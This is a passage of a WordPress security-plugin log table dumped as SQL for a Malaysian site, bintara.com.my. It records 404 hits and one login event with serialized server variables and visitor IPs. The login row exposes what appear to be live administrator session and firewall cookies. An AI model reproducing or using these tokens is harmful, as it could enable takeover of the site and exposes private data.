Vivaldi/1.96.1147.42\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:109:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"24.10.203.119\";s:11:\"REMOTE_PORT\";s:5:\"57712\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqTgiC9qkCozCNGajGpGwAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569362818.1246\";s:12:\"REQUEST_TIME\";s:10:\"1569362818\";}}','notice','2019-09-24 22:07:00','2019-09-24 22:06:58',31212512,33029384,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'24.10.203.119'),(26941,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.106 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"182.160.117.107\";s:11:\"REMOTE_PORT\";s:5:\"45431\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqVpiC9qkCozCNGajGpkgAAAVc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569363366.6913\";s:12:\"REQUEST_TIME\";s:10:\"1569363366\";}}','notice','2019-09-24 22:16:08','2019-09-24 22:16:07',30814600,32627240,'https://bintara.com.my/?page_id=18',1,0,'182.160.117.107'),(26942,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/office365/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_ACCEPT_CHARSET\";s:36:\"utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/office365/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/office365/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYqW4RaIaq52cc-9XMKP1gAAAAI\";s:12:\"REDIRECT_URL\";s:11:\"/office365/\";s:11:\"REMOTE_ADDR\";s:14:\"216.244.66.228\";s:11:\"REMOTE_PORT\";s:5:\"49074\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/office365/\";s:10:\"SCRIPT_URL\";s:11:\"/office365/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqW4RaIaq52cc-9XMKP1gAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569363681.2592\";s:12:\"REQUEST_TIME\";s:10:\"1569363681\";}}','notice','2019-09-24 22:21:23','2019-09-24 22:21:21',31149488,32956968,'https://bintara.com.my/office365/',1,0,'216.244.66.228'),(26943,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3238.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYqaMiC9qkCozCNGajGqRQAAAVA\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"64916\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqaMiC9qkCozCNGajGqRQAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569364530.6253\";s:12:\"REQUEST_TIME\";s:10:\"1569364530\";}}','notice','2019-09-24 22:35:33','2019-09-24 22:35:30',31154416,32956864,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26944,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Iridium/2018.4 Safari/537.36 Chrome/66.0.3359.130\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"99.192.214.143\";s:11:\"REMOTE_PORT\";s:5:\"37031\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqnKiC9qkCozCNGajGuhQAAAUo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569367850.8414\";s:12:\"REQUEST_TIME\";s:10:\"1569367850\";}}','notice','2019-09-24 23:30:53','2019-09-24 23:30:51',31209072,33033328,'https://bintara.com.my/?page_id=18',1,0,'99.192.214.143'),(26945,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:136:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.189 Safari/537.36 Vivaldi/1.95.1077.60\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYqqPhaIaq52cc-9XMKaVgAAAAw\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"61265\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYqqPhaIaq52cc-9XMKaVgAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569368638.1955\";s:12:\"REQUEST_TIME\";s:10:\"1569368638\";}}','notice','2019-09-24 23:43:59','2019-09-24 23:43:58',30762128,32577296,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26946,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrIRCC9qkCozCNGajHEogAAAU4\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"51080\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrIRCC9qkCozCNGajHEogAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569376325.0657\";s:12:\"REQUEST_TIME\";s:10:\"1569376325\";}}','notice','2019-09-25 01:52:07','2019-09-25 01:52:05',31152208,32969864,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26947,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:15:\"expired_session\";a:1:{i:0;s:20:\"Please log in again.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:43:\"/wp-login.php?interim-login=1&wp_lang=en_US\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"336-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:788:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C7666d1ce86dd205c7585f82f8f746a43fec60d35baf243ae9d603987f35459c0; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C96d187f4ef032996fbf808f94ac1a8bab67286bc737d9ad6ec25670084de842b; wp-saving-post=1-saved; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C22dcac49362989fcdd4214ab673d9065add0865294c218fd5bbfddb12474bd7a; wp-settings-time-1=1569371464; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:102:\"https://bintara.com.my/wp-admin/post.php?post=1449&action=elementor&ip-geo-block-auth-nonce=28ec50e1da\";s:19:\"HTTP_SEC_FETCH_MODE\";s:15:\"nested-navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"interim-login=1&wp_lang=en_US\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"60633\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrIXiC9qkCozCNGajHEzAAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569376350.1637\";s:12:\"REQUEST_TIME\";s:10:\"1569376350\";}}','notice','2019-09-25 01:52:31','2019-09-25 01:52:30',30819240,32355408,'https://bintara.com.my/wp-login.php?interim-login=1&wp_lang=en_US',1,0,'115.132.145.112'),(27642,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:62:\"Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv 11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.57.195.27\";s:11:\"REMOTE_PORT\";s:5:\"55710\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZtVocAZj7RBQ-icbk-hcgAAANU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570461089.7312\";s:12:\"REQUEST_TIME\";s:10:\"1570461089\";}}','notice','2019-10-07 15:11:32','2019-10-07 